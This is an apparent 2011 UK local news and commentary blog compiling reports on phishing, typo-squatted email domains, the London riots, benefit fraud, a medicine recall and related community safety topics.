"Today's spear phishing is not only more prevalent but also much more technically proficient," said Dave Jevans, chairman of the Anti-Phishing Working Group (APWG), an industry association dedicated to fighting online identity theft. "They're not going for a password, anymore, they're getting people to install crimeware on their computers," said Jevans.

Like the more common phishing, spear phishing attacks are launched as emails that try to con the recipient into clicking a link that leads to a malicious Web site. Those sites can take almost infinite forms, from fake account log-in screens to ones that tout a software upgrade to widely-used software, such as Adobe Flash.

MOBILE APP SECURITY : 5 WAYS TO PROTECT YOUR SMARTPHONE

Full article : http://cwonline.computerworld.com/t/7376119/930454166/515544/0/

Wave your smartphone; buy a latte. Sounds great, doesn't it? But before running off to participate in Silicon Valley's next new thing, you might want to think about a scary downside to mobile commerce: the vulnerability of smartphones to hackers.

A new report by McAfee, a vendor of anti-virus software, says that better security around networks has prompted hackers to seek new targets, and the mobile app store is one of the most tempting. Because the market for Android apps is less controlled than Apple's iTunes store, security researchers have seen a rash of attacks against that platform this year. With the exception of phones using the long-established Symbian platform, Android devices were the most likely to be targeted during the first three months of this year, according to the report.


(19th September 2011)


 

BAD SPELLING OPENS UP SECURITY LOOPHOLE
(BBC News - Technology, dated 12th September 2011)
www.bbc.co.uk

A missing dot in an email address might mean messages end up in the hands of cyber thieves, researchers have found.

By creating web domains that contained commonly mistyped names, the investigators received emails that would otherwise not be delivered.

Over six months they grabbed 20GB of data made up of 120,000 wrongly sent messages.

Some of the intercepted correspondence contained user names, passwords, and details of corporate networks.

About 30% of the top 500 companies in the US were vulnerable to this security shortcoming according to researchers Peter Kim and Garret Gee of the Godai Group.

The problem arises because of the way organisations set up their email systems. While most have a single domain for their website, many use sub-domains for individual business units, regional offices or foreign subsidiaries.

Dots or full stops are used to separate the words in that sub domain.

For example a large American financial group may take bank.com as its corporate home but internally use us.bank.com for staff email.

Usually, if an address is typed with one of the dots missing, ie usbank.com, then the message is returned to its sender.

But by setting up similar doppelganger domains, the researchers were able to receive messages that would otherwise be bounced back.

"Doppelganger domains have a potent impact via email as attackers could gather information such as trade secrets, user names and passwords, and other employee information," wrote the researchers in a paper detailing their work.

Only one of the companies being impersonated noticed that spoofing was taking place and tracked down the researchers.

Man in the middle
 
A clever attacker could cover their tracks by passing on the message to its correct recipient and relaying back any reply.

By acting as a middleman the likelihood of more messages being mis-sent using the "reply" function increases.

Follow-up work by the researchers revealed that some cyber criminals may already be exploiting keyboard errors.

A search uncovered many addresses resembling corporate sub-domains which were owned by individuals in China or linked to sites associated with malware or phishing.

Writing on the blog of security firm Sophos, Mark Stockley said: "It's striking that the researchers managed to capture so much information by focusing on just one common mistake.

"A determined attacker with a modest budget could easily afford to buy domains covering a vast range of organisations and typos," he said.

(12th September 2011)



.XXX WEB DOMAIN REGISTRATION BEGINS
(BBC News, dated 7th September 2011)
www.bbc.co.uk

 

Companies and celebrities are being given the chance to protect their names from porn hijacking ahead of the launch of the .xxx web domain.

From today, brands can request to have their name blocked from use with the new suffix, which goes live next year.

Existing adult entertainment sites can also submit their application to reserve a spot on .xxx

The "red light" suffix is intended to make it easier to find or avoid sexually explicit material online.

ICM Registry, which is administering the launch, said it hoped to "promote a responsible approach to adult content".

Brand and IP holders wanting to register now have 50 days - a so-called "sunrise period" - to submit their application.

Companies and individuals that do not want their name associated with pornography will be able to pay a one-off fee of between $150 and $300 (£100 to £200), depending on which company they register their domain with.

For example, UK adult star Teresa May might wish to bid for a .xxx domain, whereas UK home secretary Theresa May might consider protecting her name.

Conflicts over exact matching names will go through an arbitration process.

"Win, win, win"

Companies are under no obligation to go .xxx, according to ICM Registry's chief executive Stuart Lawley.

But those that did would contribute to an overall "win, win, win" situation, with benefits for adult content providers, web users in search of pornography, and those wishing to avoid it.

"Regardless of what your personal views are on the existence of pornography on the internet, at least .xxx will give people the information they need to make a choice," said Mr Lawley.

However, Jerry Barnet, chairman of the Adult Industry Trade Association, warned that anti-pornography activists would likely increase their efforts to block online adult content.

"I have mixed feeling about it," he told BBC News. "From the industry and freedom of speech point of view, I'm concerned that pro-censorship and morality campaigners will use this as an excuse to try and introduce some form of censorship.

"But from a business point of view it's kind of good for us because there are new names available, and that makes branding and site naming more interesting," he added.

Malware issues
 
ICM Registry does not process the applications directly. Firms must first approach a standard domain registrar in their home country, such as Go Daddy or Enom.

To ensure the registered porn sites do not harbour malware or present any other cyber security-related threats, ICM said they will be scanned daily by security firm McAfee - something that would make them safer to visit than many non-xxx sites.

The websites will be overseen by the International Foundation for Online Responsibility, and will be fitted with an electronic label to allow parents to adjust their browser settings and make sure children do not have access to certain sites.

After the sunrise period is over, a "land rush" period will run for 17 days, allowing prospective adult sites to register for the remaining .xxx addresses.

Following that, anyone else will be able to submit an application for non-reserved names on a first come, first served basis.

(8th September 2011)


 

CHARITABLE PUBLIC MISLED BY COMMERCIAL COLLECTION COMPANIES
(British Heart Foundation, dated 31st August 2011)
www.bhf.org.uk

New research by our shops shows that as little as a third (30%) of items donated to charity via letterbox charity bags stand a chance of ending up in charity shops  - much to the surprise of UK householders.

Our shops alone have seen a 36% drop in household collections meaning a loss of £4.6 million over the last two years.

Our research reveals that over two thirds of charity bags an average householder receives are from commercial companies working with charities by selling the donated items overseas for profit.

Worryingly, over six out of ten people (65%) aren't aware these commercial companies exist and think 100% of the profits made from their charity bag donations go to the charity involved. The reality is that in some cases as little as 5% is paid to a charity who is working with a commercial company. 85% of people who are now aware of this activity say it makes them feel shocked, cheated and disheartened.

BHF Shops are releasing these findings in advance of their BIG Donation stock appeal this September because they think its vital people understand where their charity bag donations are going so they can make an informed choice when choosing which charity to support.

As well as causing confusion, the escalation in commercial activity has had a negative impact on charity bag donations. Our Shops alone have seen a 36% drop in household collections meaning a loss of £4.6 million over the last two years (2009-2011).

Retail Director, Mike Lucas, says: "It is vital commercial companies act responsibly and be transparent on their charity bags - particularly around how much profit the named charity will actually make from a collection.

Householders have the right to know what happens to their donations and currently this information is not clear. "Although this is a legal way to raise money, companies working for commercial gain are a huge problem for charities with high street shops. BHF Shops do not work with these companies and because of this 100% of the profits made from charity bag donations stay with us - helping us continue our lifesaving work".

Advice to householders

Take your donations directly into your local BHF Shop this September and support our biggest stock appeal - The Big Donation. Aiming to bring in over 600,000 bags of stock throughout the month, everyone can help by donating good quality clothing, shoes, accessories, CDs, DVDs, books, toys and bric-a-brac to their local BHF Shop.

- Check charity bags and leaflets for information about how much of the proceeds from your items go to the charity.
- Our shops carry out doorstep collections using clearly identified vans and drivers. Ask the collector for identification if you're not sure.
- The BHF also offers a free collection service for those larger items.

British Heart Foundation website : www.bhf.org.uk

(1st September 2011)



DVD ISSUED TO SCHOOLS TO TACKLE SERIOUS ORGANISED CRIME
(Lothian and Borders Police, dated 25th August 2011)
www.lbp.police.uk

Lothian and Borders Police is taking the fight against serious organised crime to secondary schools throughout the area.

 

A hard-hitting DVD is being launched outlining what serious organised crime is, how it can impact on teenagers and their local community, and how easy it is to make a bad decision and become involved in it.

All secondary school children in the force area from S2 and above will be shown the five-segment film 'Slide'. It depicts one youngster's descent into a life of crime and drug addiction after he becomes involved with serious organised crime.

The DVD was commissioned after the Serious Organised Crime Taskforce published their "Letting Our Communities Flourish' document - a campaign to reduce the impact of serious organised crime across Scotland.

In order to involve the community in this project, Lothian and Borders Police worked with Greenbanana Films, based in Dalkeith, to develop the DVD. An additional training package has also been developed for adults who work with children in youth clubs and voluntary organisations.

The launch comes amid Lothian and Borders Police's ongoing "Made From Crime' campaign, designed to target those who have been drawn into a life of crime and are living lavish lifestyles on the illegal proceeds.

Chief Superintendent Malcolm Graham believes the DVD is an important reminder that the consequences of a life of crime will far outweigh any perceived benefits.

Chief Superintendent Graham said: "Organised crime group leaders like to avoid police attention by coercing others into doing their dirty work for them.

"Many young people may be seduced by the notion that crime brings with it perks such as designer clothes, fast cars and big houses but this DVD quickly dispels that myth.

"Campaigns like our 'Made From Crime' initiative and 'Slide' DVD reinforce this is not the case, and that Lothian and Borders Police will robustly target anyone believed to be involved in this type of criminality.

"The reality is that if you become involved in serious organised crime you face frequent and lengthy jail terms and a very poor quality of life.

"Lothian and Borders Police are committed to tackling the crime groups that blight our community.

"We will continue to work closely with our partner agencies prevent crime groups accessing and influencing the young and more vulnerable members of our communities.'

Councillor Marilyne MacLaren, Education Leader, said: "There is nothing glamorous about a life of crime and I am sure this hard-hitting DVD will drive home to our young people the message that it will bring nothing but misery to both themselves and their families.

"Criminals are being sent to prison every day of the week so it is important teenagers fully realise the dangers they could place themselves in by going down this treacherous path."

(30th August 2011)


 

DATA PROTECTION

Before I go into a little more detail on this subject I thought I would include a jovial letter that has been "doing the e-mail rounds" (okay spam). The letter is full of sarcasm, but I think that it gets to the point of ineffectual data protection rules quite well.

---------------
Dear Minister,

I'm in the process of renewing my passport but I am a total loss to understand or believe the hoops I am being asked to jump through.

How is it that Bert Smith of T.V. Rentals Basingstoke has my address and telephone number and knows that I bought a satellite dish from them back in 1994, and yet, the Government is still asking me where I was born and on what date?

How come that the chappy who comes round every Thursday night with his DVD rentals van can tell me every film or video I have had out since he started his business up eleven years ago, yet you still want me to remind you of my last three jobs, two of which were with contractors working for the government?

How come the T.V. detector van can tell if my T.V. is on, what channel I am watching and whether I have paid my licence or not, and yet if I win the government run lottery they have no idea I have won or where I am and will keep the bloody money to themselves if I fail to claim in good time. Do you people do this by hand?

You have my birth date on numerous files you hold on me, including the one with all the income tax forms I've filed for the past 30-odd years. It's on my health insurance card, my driver's licence, on the last four passports I've had, on all those stupid customs declaration forms I've had to fill out before being allowed off the planes and boats over the last 30 years, and all those insufferable census forms that are done every ten years and the electoral registration forms I have to complete, by law, every time our lords and masters are up for re-election.

Would somebody please take note, once and for all, I was born in Maidenhead on the 4th of March 1957, my mother's name is Mary, her maiden name was Reynolds, my father's name is Robert, and I'd be absolutely astounded if that ever changed between now and the day I die!

I apologise Minister. I'm obviously not myself this morning. But between you and me, I have simply had enough!

You mail the application to my house, then you ask me for my address. What is going on? Do you have a gang of Neanderthals working there? Look at my damn picture. Do I look like Bin Laden? I don't want to activate the Fifth Reich for God's sake! I just want to go and park my weary backside on a sunny, sandy beach for a couple of week's well-earned rest away from all this crap.

Well, I have to go now, because I have to go to back to Salisbury and get another copy of my birth certificate because you lost the last one. AND to the tune of 60 quid! What a racket THAT is!! Would it be so complicated to have all the services in the same spot to assist in the issuance of a new passport the same day? But nooooo, that'd be too damn easy and maybe make sense. You'd rather have us running all over the place like chickens with our heads cut off, then find some ##### to confirm that it's really me on the goddamn picture - you know... the one where we're not allowed to smile in in case we look as if we are enjoying the process!

Hey, you know why we can't smile? 'Cause we're totally jacked off!


I served in the armed forces for more than 25 years including over ten years at the Ministry of Defence in London . I have had security clearances which allowed me to sit in the Cabinet Office, five seats away from the Prime Minister while he was being briefed on the first Gulf War and I have been doing volunteer work for the British Red Cross ever since I left the Services. However, I have to get someone 'important' to verify who I am -- you know, someone like my doctor... who got his medical degree only 6 months ago !

Yours sincerely,

An Irate British Citizen

-------------------------------

Government Surveys

The point of including the previous e-mail was to highlight the point that Government departments do have a plethora of information about each UK citizen, but none of this information is formally linked together. Why ? Put simply, it is the UK data protection laws and their application. Things are so bad that the government needs to carry out anonymous respondent surveys to see how much benefit claimants are getting in total. They are not allowed to trawl their own systems to determine what an individual is getting ? One of the main organisations used to obtain this information is the Office for National Statistics (ONS), a Government agency. The ONS computer system will chose a "random" list of addresses in the UK (several thousand). An introductory letter will be sent to the occupier at those addresses. No names are used as the "system" doesn't know who lives at those addresses. The coaxer / enticer for the recipiant participating in this exercise was ( may well still be ) a book of first class stamps! For this reward the voluntary respondent will be able to aire their views on the current topic being surveyed after they have answered up to 2 hours worth of questions. Not only will the visiting questioner ask questions, they will also ask to see paper evidence of such things as pension payments, tax credits, child benefit and Jobseekers allowance etc. Things get worse if the respondent is in rented accommodation as local council payments are then involved and evidence of those payments will also be sought.

The central Government has no idea of how much each individual benefit claimant is being paid.

For some reason the current Government is not happy with the concept of identity cards. Perhaps they were all former viewers of the cult TV programme "The Prisoner" and its catchphrase "I am not a number, I am a free man"! Or was it "Big Brother" of the novel 1984 ! The thing is, we are all referred to by reference numbers already and have been for years, for example :

- Driving licence number.
- National Insurance number
- National Health Service medical number
- Passport number

These all use individual reference numbers or accounts, but the databases on which they sit are not cross referenced.

In the current Global economy where data can be stored anywhere in the world can you imagine what problems could occur if these computer systems were administered by companies operating in countries that did not have data protection laws ? The problem is, some of them do !

For now all we can do is just sit and read about each incident as it occurs.


 

BENEFIT FRAUD COSTS TOWN HALLS £20 MILLION
(Evening Standard, dated 26th August 2011 author Peter Dominiczak)
www.thisislondon.co.uk [Note 1]

Town halls across the capital paid out more than £20 million of taxpayers' money to benefit fraudsters last year, the Standard can reveal.

Exclusive figures obtained by this newspaper show that councils are handing out millions every year to people making false housing and council tax claims.

Five councils in the capital had at least £1 million illegally claimed over the course of 12 months, according to statistics released by the Audit Commission.

Brent, Haringey, Lambeth and Ealing had the highest levels of illegal benefit claims, with Brent paying out £1.33 million to just 154 claimants.

The figures show that Barnet council paid out £4.6 million in 2009/10, though officials say only £1.1 million of this was fraudulently claimed and the rest was overpaid for other reasons.

Communities Secretary Eric Pickles announced a 10-point plan to tackle council fraud across England and recover £2 billion a year earlier this year. He said: "It's time to get tough and take on the fraud cons."Better prevention, detection and recovery of fraud will help reduce the financial pressure on councils and help protect front line services. He added: "Councils should carry out better credit checks through credit rating agencies before giving over discounts or benefits."

Campaigners said today that the figures are evidence that Britain's benefits system is in need of urgent reform.

Robert Oxley, from the TaxPayers' Alliance, said: "Hard-working taxpayers will be angry their cash is ending up in the pockets of benefit cheats because London councils aren't able to ensure tens of millions of pounds doesn't end up in the hands of layabouts."

He added: "The welfare system is there to help the most vulnerable, this fraud is yet more evidence it is broken and in serious need of reform."

A London Councils spokesman said: "Councils face a significant challenge in combating benefit fraud. While all reasonable efforts are made to fully assess claims, councils do not have the resources required to investigate fully every single claimant so to some extent have to rely the general public."

Meanwhile, Barnet council leader Richard Cornelius said: "Barnet takes benefit fraud extremely seriously, and takes legal action to see that public money is recovered and offenders prosecuted."

Authorities with smallest amounts of money defrauded were City of London Corporation, Richmond, Merton, Barking and Hammersmith.

£1.5 million property empire financed by false claims

A family of four who built up a London property empire worth £1.5 million through fraudulent claims were jailed this year after a four-year investigation by Barnet council and other bodies.

The evidence revealed how money claimed illegally was then used to finance mortgage repayments on a number of properties across London. Three of the houses were in Barnet, one in Ealing and one in Waltham Forest.

The case hit the headlines after the judge dismissed the jury at the trial amid claims of "nobbling" and returned her own verdict.

Riccardo Guthrie, 33, was jailed for three years. Bianca Guthrie, 37, and Cosima Guthrie, 25, were jailed for two years and 18 months respectively. A fourth defendant, Courtney Campbell, 48, their accomplice, was given a year's suspended jail sentence and ordered to complete 160 hours of unpaid community work.


 

(29th August 2011)


 

POST RIOT - SOURCES OF INFORMATION

To provide information :

Metropolitan Police video images of suspects : www.met.police.uk/disordersuspects/
Metropolitain Police Major Investigation Team : 020 8345 4142
Crimestoppers ( Nationwide crime anonymous reporting ) : 0800 555 111

On where to receive help :

Communities and Local Government : http://www.communities.gov.uk/corporate/riotsupport/
Government Information website : www.direct.gov.uk/riotadvice

(27th August 2011)


 

RIOT BY NUMBERS

NATIONWIDE THERE HAVE BEEN 5 DEATHS.

237 Metropolitan Police officers were injured, having experienced unprecedented violence directed at them during the disorder.

The violence ripped through 22 of the 32 London boroughs.
The London Fire Brigade received over 1,700 calls for their help to deal with fires.


The latest Met Police information on arrests and charges:

- 1985 total arrests (adult: 1564 / juveniles: 421)
- 1138 people have been charged (adult: 895 / juveniles: 243)
- There were 3296 Notifiable offences, broken down into the following categories :

Arson 162
Assault with Injury 80
Burglary in a Dwelling 48
Burglary in Other Buildings 1101
Robbery of Business Property 102
Common Assault 32
Criminal Damage To a Dwelling 70
Criminal Damage To M/V 399
Criminal Damage To Other Bldg 280
Drug Trafficking 4
Going Equipped 8
Handling Stolen Goods 95
Harassment 43
M/V Interference & Tampering 4
Murder 2
Offensive Weapon 39
Other Criminal Damage 90
Other Fraud & Forgery 1
Other Notifiable 110
Other Theft 45
Other Violence 49
Robbery of Personal Property 310
Picking Pockets, etc 3
Possession Of Drugs 58
Serious Wounding 48
Snatches 36
Theft From M/V 42
Theft From Shops 17
Theft/Taking of M/V 10
Theft/Taking of Pedal Cycles 8

(27th August 2011)


 

LONDON RIOT ARRESTS REACH 2,000
(BBC News, dated 25th August 2011)
www.bbc.co.uk

The Metropolitan Police said it has now arrested more than 2,000 people in connection with rioting and looting across London earlier this month.

Scotland Yard said that 2,006 people had been arrested and of those 1,135 had been charged.

Separate figures from the Ministry of Justice show that, across England, almost 1,500 people have appeared in court to answer riot-related charges.

Some 70% of alleged offenders have been remanded in custody.

Scotland Yard said 954 of those charged over London's disturbances had already appeared before the court, 82 had been sentenced and 42 jailed.

The force has also launched an online gallery of some of those offenders, detailing their crimes and sentences.

Commander Simon Foy said: "We have made these pictures available so that communities across London can see that those who took part in the appalling scenes which shocked us all have been brought to justice. "I want to send a clear message to those involved that you will not get away with it.

"The determination and dedication of officers from all parts of the Met have led to this important milestone, but we are far from finished. The investigation into the widespread criminality we saw remains a major task on an unprecedented scale.

"We have got to this point with fantastic support from the public and I urge anyone with any information to come forward."

Of the 1,500 offenders who have appeared in courts nationwide, more than 160 have already been sentenced and half of them jailed.

One in 10 of the 300 juveniles who have been appeared in court have received custodial sentences. Nine out of 10 of the offenders currently being dealt with were male.

On Thursday, five men were jailed at Wood Green Crown Court for looting Zee & Co clothing store in Bethnal Green, East London.

About £100,000 damage was caused to the store and £646,524 goods taken on 8th and 9th August.

(27th August 2011)


 

ALERT OVER NUROFEN PLUS DRUG MIX-UP
(BBC News, dated 25th August 2011)
www.bbc.co.uk

Consumers are being warned to check packs of Nurofen Plus after it emerged that thousands could mistakenly contain antipsychotic drugs.

The Medicines and Healthcare products Regulatory Agency (MHRA) has issued a safety alert following reports that some batches contained Seroquel XL 50mg instead of Nurofen Plus.

The affected 32-tablet packs are in batches numbered 13JJ, 57JJ and 49JJ.

People with affected packets should return them to their pharmacy.
The mix-up is still under investigation, and packs from the three batches have been found across the UK.

Seroquel XL is a prescription-only anti-psychotic drug used to treat several disorders including schizophrenia, mania and bipolar depression.

Nurofen Plus is for pain relief and contains codeine and ibuprofen.

Each of the affected batches contains between 4,000 and 7,500 packs - around half a million in total. But not all the packs are affected.

'Serious investigations'
 
The Seroquel tablets are larger and have gold and black packaging, compared with the Nurofen Plus tablets which are smaller and have silver and black packaging.

Nurofen Plus is stocked behind the counter in chemists, so people cannot simply pick it up.

Ian Holloway, from the MHRA's defective medicines report centre (DMRC), said: "People should check to see if they have any affected packets of Nurofen Plus."If you do, return them to the pharmacy where you bought them from. "You can also report this to the MHRA's DMRC on 020 3080 6574." He added: "If you have taken a tablet and you have any questions, speak to your GP."

There have been three reports of affected packs. Two people are believed to have taken Seroquel by mistake, but are not thought to have experienced any ill-effects.

In a statement, Reckitt Benckiser which makes Nurofen Plus, said the three cases so far been identified had all been in South London.

And it said "serious investigations" were under way to establish how the mix-up occurred, especially as Seroquel XL is manufactured by another drug firm, AstraZeneca.

It added: "After careful review of the manufacturing system, manufacturing errors by the makers of Nurofen Plus or Seroquel XL are not thought to be part of the cause at this stage."

Dr Aomesh Bhatt, medical director for Nurofen Plus, said: "We are taking this matter extremely seriously and we are working closely with the MHRA to investigate fully.

"Additionally, we are in the process of working to ensure the Nurofen Plus packs are double-checked by pharmacy staff before they are handed to customers.

"We encourage consumers of Nurofen Plus to be vigilant and, while it is very unlikely, should they find they have a suspect pack or if they have any other concerns, we advise them to speak to the pharmacist where they purchased the product."

AFFECTED PACKS

Batch 13JJ - Expiry date 03/2014. Product licence no - 00327 / 0082. First distributed - 30th April 2011
Batch 57JJ - Expiry date - 05/2014. Product licence no - 00063 / 0376. First distributed - 21st June 2011
Batch 49JJ - Expiry date - 05/2014. Product licence no - 00063 / 0376. First distributed - 1st July 2011


(25th August 2011)



MORE NEWS FROM MY SPAM INBOX ! - AUGUST 2011
Category : phishing

 

My Internet Service Providers (ISP) spam filter has continued to do a very good job. In the last 4 weeks it has managed to filter out 10 phishing e mails and place them in a "be warned" post box.

The latest batch of phishing e-mails include :

HALIFAX BANK - Nine e-mails have been received with 8 variations of originators name "Halifax Secure"," Halifax Online","Halifax Online-services", "Halifax - Onlineservices","Halifax Bank Plc","Halifax Bank plc","Halifax" and "Internet Banking" (Title: Message from Halifax Bank). The following are examples of the attached messages :

- Click on attachment to view message (5)
- Your Halifax Online Banking  Account  temporarily Block or Restricted! Click on link.
- You have a message from the bank. Click on link and enter account and password to view message.
- The bank is upgrading it's security on your account (new technology etc), Click here to upgrade your account security.

LLOYDS TSB - e-mail stating that I can upgrade my internet banking service. Click on link and enter personal details.

All of these e mails are bogus and are just phishing for personal information. If you receive them, delete them immediately and do not CLICK on any link or open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, DO NOT use contact details within these bogus e-mails.

(20th August 2011)


 

SUZY LAMPLUGH'S MOTHER DIANA DIES AFTER HAVING A STROKE
(
BBC News, dated 19th August 2011)

The mother of murdered estate agent Suzy Lamplugh has died.

Personal safety campaigner Diana Lamplugh, 75, died in her sleep in a London hospital after suffering a stroke.

She set up the Suzy Lamplugh Trust after her 25-year-old daughter disappeared in 1986, having left her west London offices to meet a client.

Mrs Lamplugh campaigned on issues ranging from making minicabs safer to protecting victims of stalking.

Paul Infield, chairman of the Suzy Lamplugh Trust's board of trustees, said: "Diana was one of those people who contributed energy, focus and commitment to everything she did.

Battle with Alzheimer's
 
"With her husband Paul, she was tireless in establishing, through the trust, the concept of and discipline for personal safety - now a household expression - as a positive life skill for people of all ages and occupations."

Mrs Lamplugh, who was appointed an OBE in 1992, first suffered a stroke in 2003 and then had a nine-year battle with Alzheimer's.

She leaves her husband Paul, her other children Richard, Tamsin and Lizzie, and her seven grandchildren.

Her daughter Suzie's remains have never been found but she was declared dead, presumed murdered, in 1994. Officers have examined thousands of lines of inquiry and conducted DNA testing on 800 unidentified bodies.

Suzy Lamplugh Trust website: www.suzylamplugh.org/

(19th August 2011)



NEW REFERRAL UNIT TO KEEP INTERNET SAFE FROM TERRORISTS
(Dyfed-Powys Police, dated 17th August 2011)
www.dyfed-powys.police.uk

 

The internet can be used to promote terrorism and violent extremism and corrupt those individuals who are vulnerable to radicalisation. Recent cases such of that of Isa Ibrahim and Nicky Reilly who were convicted of terrorist offences after being radicalised on the internet shows the influence it can have on people.

The ACPO Counter Terrorism Internet Referral Unit (CTIRU) was set up a year ago to make the internet a more hostile place for terrorists.

The CTIRU aims to remove unlawful terrorist material content from the internet with a focus on UK based material. It also works with international partners to remove material hosted abroad.

The unit provides the police service with a pool of experts who carry out initial assessments of terrorist and violent extremist material on the internet.

It is also responsible for alerting forces, Counter Terrorism Units/Counter Terrorism Intelligence Units and the Metropolitan Police Service Counter Terrorism Command to online terrorist offences that may fall within their jurisdiction.

The CTIRU also has a national responsibility for serving any Section 3 Terrorism Act notices within the UK and focuses on developing and maintaining relationships with the internet industry and also forging links with key international partners.

Chief Superintendent Gwyn Thomas said: "Whilst the internet makes a positive contribution to most people's lives on a daily basis it can and is used by criminals and terrorists.

"Policing within the environment of the internet is a relatively new area but we are aiming to make it a more hostile for people who use it for criminal purposes.

"The CTIRU is focused on material that is used for terrorist purposes or to promote extremist messages that radicalise vulnerable people.

"A lot of what is referred to us by the public may not breach the law however we are best placed to conduct that assessment and its important that we know the scale and range of material available to the public.

"It may not always be possible to remove referred content due to the global nature of the internet, it is therefore important that the international policing community works together on these issues."

Referrals can be made directly to the CTIRU from the police or agencies or there is an anonymous referral system for members of the public at www.direct.gov.uk/reportingonlineterrorism.

Ch Supt Thomas added: "We would urge officers to refer sites through their Special Branches who will link into the CTIRU. "In addition you can contact the CTIRU directly for advice and information regarding terrorism content on the internet."

The CTIRU can be contacted at CTIRU@acpo.pnn.police.uk

(18th August 2011)


 

CLAIMS FOR COMPENSATION UNDER THE RIOT DAMAGES ACT 1886
(MPA website, modified)

If you've suffered loss or damage as a result of the recent riots you may be able to claim compensation.

Under the Riot (Damages) Act 1886, your local Police Authority is liable to pay for damage to buildings and their contents which has occurred in the course of a riot. The Act provides for compensation to be paid for losses through injury, destruction or stealing, to houses, shops and other buildings or their contents caused by any person involved in a riot. Claims will be assessed in accordance with the legal definition of a riot.

The Act does not include damage to or theft of a vehicle unless that vehicle was housed within a building. It also excludes personal injuries, compensation for non-material losses, such as interruption to trading. No costs will be allowed to any person claiming.

The Act applies to both insured and uninsured members of the public as well as insured and uninsured businesses.

For the claim form and details of how to claim go to the following websites :

Metropolitan Police : www.mpa.gov.uk/work/compensation/

UK Government website : www.direct.gov.uk/en/Nl1/Newsroom/DG_198958

(17th August 2011)



PROUD TO BE A LONDONER
(Courtesy of Andy Love, MP Edmonton, 12th August 2011)

 

The violence that unfolded across the capital and beyond was shocking to say the least.  It was truly saddening to see widespread disgraceful criminal behaviour taking place on our streets.  There can be no excuses for it.

I have been keeping in close contact with Enfield's police commander and I know just how hard the police are working to keep people safe and to protect their businesses and homes.  We continue to need to strongest possible police response so as not to undermine the calm and security that has been restored to our streets.  There must be no 'no-go' areas for the police.

It must be remembered that this criminality was carried out by a small majority of our community.  They will not go unpunished.  The priority now is taking the action that will end the sense of fear many families are feeling.  Adequately reprimanding those involved will go some way to achieving this.

It is also vital that there is a rapid response to help those communities hit hardest by these riots to get back on their feet as quickly as possible.  Public safety is imperative but we also need immediate and focussed help for those people who have lost homes and businesses.  This includes insurance companies fast-tracking claims so that things can be put right at the earliest opportunity, as well as targeted financial support for the most affected councils.

I will be working to ensure that victims of this inexcusable violence are not left to cope alone.  Our community is vitally important to us and it is positive to see that it has been strengthened, not weakened, by the mindless rioting.  There is no shame in still being proud to be a Londoner.

Andy can be found at :

www.andylovemp.com

www.andylovemp.blogspot.com

E-mail : andylovemp@aol.com

(12th August 2011)


 

A BETTER MAN THAN ME

On the evening of Tuesday 9th August 2011 in Birmingham three young men died whilst trying to protect their community. They were standing on Dudley Road near a petrol station when a speeding car allegedly swerved into them deliberately.

How would you react ? I am quite sure that I would not act as honourable as this man.


FATHER'S PLEA FOR RESTRAINT - Mr Tariq Jahan

MY SON Haroon was 21 years old and a good lad. Everybody in the community knew him. All the street were out and basically he was looking out for the whole community.

He stood up for the community and unfortunately last night was killed with two of his friends. He was defending his community and people round here. They smashed into the petrol station and the social club.

Because he was a young chap he was inclined to join all the locals round here, everyone was out on the corner and car came out of nowhere for God knows what reason.

I didn't see it with my own eyes I was round the corner...I heard the car coming at high speed. I heard the thud, ran round and I saw three people on the ground.

My instinct was to help the three people. I didn't know who they were or if they'd been injured. I was helping the first man and someone came up behind me and told me my son was lying behind me. So I started CPR on my own son, my face was covered in blood, my hands were covered in blood.

The guy who killed him drove directly into the crowd and killed three innocent guys. Why? What was the point of doing that ? I don't understand.

They were defending the community from all the problems going on around the country. He was trying to help his community.

He was a good lad. He was very, very intelligent, very smart.

He was the youngest, and anything I ever wanted done, I would always ask Haroon to sort it out for me.

He was a good kid, everyone knew him and loved him. I can't describe to anyone what it feels like to lose your son, I miss him dearly but two days from now the whole world will forget - no one will care.

I don't blame the Government, I don't blame the police, I don't blame anybody.

I'm a Muslim. I believe in divine fate and destiny, and it was his destiny and fate, and now he's gone.

And may Allah forgive him and bless him.

Tensions are already high in the area. It's already bad enough what we are seeing on the streets without other people taking the law into their own hands.

My family wants time to grieve for my son. People should let the law deal with this.

Today we stand here to plead with all the youth to remain calm, for our communities to stand united.

This is not a race issue. The family has received messages of sympathy and support from all parts of society.

I lost my son.
Blacks, Asians, Whites - we all live in the same community.
Why do we have to kill one another ?
Why are we doing this ?

Step forward if you want to lose your sons.

Otherwise, calm down and go home - please.

(12th August 2011)



 

WE CANNOT ALLOW THESE CRIMINALS TO TAKE CONTROL OF OUR NEIGHBOURHOODS
(Courtesy of Nick de Bois MP Enfield North, 9th August 2011)
www.nickdebois.com  [Note 1]

The dreadful scenes in Enfield on Sunday night and last night have been truly disgraceful.

I was in Enfield Town from about 6pm on Sunday evening. The scenes that residents and I witnessed of people with their faces covered intent on attacking the police and local shops were as shocking as they were surprising.

The vast majority of these people were not from Enfield. This was organised criminal activity. People had come from other parts of London and elsewhere after being co-ordinated via social media and mobile phone. The police acted in a controlled and very professional manner which dispersed a large crowd of people, making many arrests.

It was telling that vandals fleeing from the police would run back through side streets to get into their suped-up cars and leave to meet up elsewhere.

It is difficult to see how anyone could argue this was some kind of uprising from a frustrated, deprived underclass. That people have gone out to commit criminal acts on an organised day to capitalise on those awful events at the weekend is deplorable.

It has now also been reported by the Enfield Independent that the fire at the large Sony distribution warehouse in Enfield Lock was started by teenagers with petrol cans. It is beyond belief.

I want to pay tribute to the bravery and professionalism of the police, who did and will no doubt continue to do a superb job in minimising the damage to our neighbourhoods. Given the scenes we have witnessed in other parts of London since Sunday, it is clear things could have been a lot worse.

There have so far been over 450 arrests and I am adamant that anyone convicted of the crimes committed in the past few days must be given custodial sentences. Given the way our police force is clearly over-stretched and struggling to contend with the unprecedented levels of violence, I have called publicly for the Government to bring in the military to protect our fire services so they can deal with burning buildings without fear of attack, and for water cannon to be made available.

The Metropolitan Police have launched Operation Withern to investigate the disorder and violence across London.

An incident room has been set up and I have been advised that anyone with information should call the Major Investigation Team on 020 8345 4142. The long arm of the law must reach those responsible for these appalling acts.

Editors Note : An offer has been made to publish comments on these current events from other Politicians from the London Borough of Enfield.

(12th August 2011)


 

NO EXCUSE

You may have watched Sky News on Sunday evening. There was a scene of some thugs kicking at the door of a local Enfield pharmacy. The shop has been there for approaching 20 years with the same proprietor, as a local resident you may have received some advice from him. He is part of this community. When those thugs were kicking in his store, did you notice that there was someone inside trying to keep those doors shut ?

